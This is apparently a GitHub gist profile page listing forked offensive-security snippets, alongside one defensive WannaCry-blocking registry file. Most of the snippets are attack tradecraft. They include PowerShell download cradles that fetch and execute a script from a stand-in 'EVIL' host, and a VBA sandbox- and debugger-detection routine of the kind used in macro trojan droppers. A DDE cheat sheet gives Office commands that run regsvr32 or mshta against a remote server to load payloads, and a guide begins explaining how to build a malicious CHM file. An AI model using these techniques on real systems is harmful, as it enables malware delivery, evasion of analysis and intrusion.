Skip to content

Instantly share code, notes, and snippets.

View 404definitelynotfound's full-sized avatar

404definitelynotfound

View GitHub Profile
@404definitelynotfound
404definitelynotfound / wannacry-vaccine.reg
Created November 20, 2018 08:17 — forked from Neo23x0/wannacry-vaccine.reg
WannaCrypt Ransomware Immunisation
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskdl.exe]
"Debugger"="taskkill /F /IM "
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskse.exe]
"Debugger"="taskkill /F /IM "
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wannacry.exe]
"Debugger"="taskkill /F /IM "
@404definitelynotfound
404definitelynotfound / DownloadCradles.ps1
Created November 20, 2018 08:11 — forked from mgeeky/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@404definitelynotfound
404definitelynotfound / MacroDetectSandbox.vbs
Created November 20, 2018 08:09 — forked from mgeeky/MacroDetectSandbox.vbs
Visual Basic script responsible for detecting Sandbox environments, as presented in modern Trojan Droppers implemented in Macros.
Private Declare PtrSafe Function isDbgPresent Lib "kernel32" Alias "IsDebuggerPresent" () As Boolean
Public Function IsFileNameNotAsHexes() As Boolean
Dim str As String
Dim hexes As Variant
Dim only_hexes As Boolean
only_hexes = True
hexes = Array("0", "1", "2", "3", "4", "5", "6", "7", _
"8", "9", "a", "b", "c", "d", "e", "f")
@404definitelynotfound
404definitelynotfound / Macro-Less-Cheatsheet.md
Created November 20, 2018 08:04 — forked from mgeeky/Macro-Less-Cheatsheet.md
Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet

Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet

  • Using regsvr32 *.sct files technique:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data   || regsvr32 /s /n /u /i:http://192.168.56.101/empire2.sct scrobj.dll"
  • Using HTA files technique:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || mshta http://192.168.56.101/poc.hta"
@404definitelynotfound
404definitelynotfound / Malicious-CHM-Guide.md
Created November 20, 2018 07:52 — forked from mgeeky/Malicious-CHM-Guide.md
CheatSheet describing how to create malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).

Procedure for generating Malicious CHM file

  • Step 0: Download and install Microsoft HTML Help Workshop and Documentation
  • Step 1: Obtain a valid CHM file and unpack it using 7-zip
  • Step 2: Find an entry-point HTML file within "docs" directory and insert the following code into it's <body> section:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>